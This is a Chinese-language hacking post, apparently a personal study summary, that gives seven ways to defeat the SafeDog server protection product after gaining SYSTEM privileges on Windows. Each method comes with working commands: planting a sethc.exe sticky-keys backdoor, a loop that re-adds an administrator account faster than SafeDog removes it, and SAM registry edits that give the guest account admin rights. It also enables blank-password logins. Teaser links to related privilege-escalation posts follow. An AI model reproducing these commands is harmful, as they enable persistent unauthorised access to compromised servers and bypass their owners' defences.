注:個人學習總結心得。
提權時候拿到system許可權後,安全狗
就如同渣渣,不是麼?
打狗棍法一:
system許可權下直接執行k狗工具,k掉安全狗
的防禦,
打狗棍法二:
上傳shift後門
,(有可能被攔截)
直接複製
copy c:\sethc.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
或者登錄檔劫持,修改壓縮包裡面登錄檔裡面檔案的路徑
打狗棍法三:
在net1沒禁用的情況下,
安全狗的攔截加賬戶,是每兩秒檢測一次保護的使用者組,檢測到新新增的就會刪除,我們可以利用的就是他這個兩秒時間,
利用for迴圈來不斷的加帳號,一直加,他一直刪,我們能進入伺服器,不是麼?執行100次加賬戶的命令,
for /l %%i in (1,1,100) do @net user asphxg asphxg /add&@net localgroup administrators asphxg /add
打狗棍法四:
首先,用guest,演示一下,具體操作是通過登錄檔,篡改sam下使用者的f值,使其達到管理許可權.
首先,你必須有可以提權的exp,使自己達到system許可權,大家都知道,administrator對應值是1f4,guest是1f5,如果有例外,下面會講到。
下面是步驟:
1.使用net1 user guset 1 ,將guest密碼重置為1,無需過問是guest否禁用
2.執行:reg export "hkey_local_machine\sam\sam\domains\account\users\000001f4" "c:\recycler\1.reg"
匯出administrator的登錄檔值到某路徑,修改內容,將"v"值刪除,只留f值,將1f4修改為1f5,儲存。
3.執行regedit /s c:\recycler\1.reg 匯入登錄檔
就可以使用,guest 密碼 1登陸了。
安全狗說:在賬戶保護全開的情況下,如果不能更改密碼呢?!
打狗棍法五:
如果真的不能更改密碼呢?則使用vbs檢視iis使用者密碼,再使用
reg export "hkey_local_machine\sam\sam\domains\account\names\使用者名稱" "c:\2.reg"
檢視其對應值,再重複以上第二步和第三步,使用檢視到的明文密碼登陸
如果不允許修改密碼,iis使用者是禁止登陸遠端桌面的呢?
打狗棍法六:
對啊,我們該怎麼辦?繼續聽我說,大家都知道guest是空密碼,那我們就使用空密碼登陸。
執行reg add hklm\system\currentcontrolset\control\lsa\ /v limitblankpassworduse /t reg_dword /d 0 /f
修改limitblankpassworduse值為1,重複上面第二第三步驟,繼續登陸。
打狗棍法七:
直接修改管理員密碼~
oh ye~
注:個人學習總結心得。
伺服器安全狗提權放sethc後門
by 永恆 qq 97245325 今天一朋友給我乙個shell。說要mysql提權。版本是mysql版本 5.1.57 5.0以上的要在mysql目錄裡才可執行。可f zkeyssoft mysql mysql server 5.1 lib plugin 不能建立目錄。所以mysql的提權方法不能...
9種經典的webshell提權方法
第一 如果伺服器上有裝了pcanywhere服務端,管理員為了管理方便 也給了我們方便,到系統盤的documents and settings all us 破解就使用pcanywhere連線就ok了 第二 有很多小黑問我這麼把webshell的iis user許可權提公升 一般伺服器的管理都是本機...
一次利用MSSQL的SA賬戶提權獲取伺服器許可權
遇到小人,把伺服器整走了 自己手裡只有sql server的sa賬號密碼 模糊記起之前用這個賬戶提權讀取檔案的事 各種工具也用了不少 發現不是語法錯誤就是許可權不夠 無奈之下裝了sql server r2直接來操作 順利連線上去,看到有master這個庫。直奔重點去 這裡要用到的就是xp cmdsh...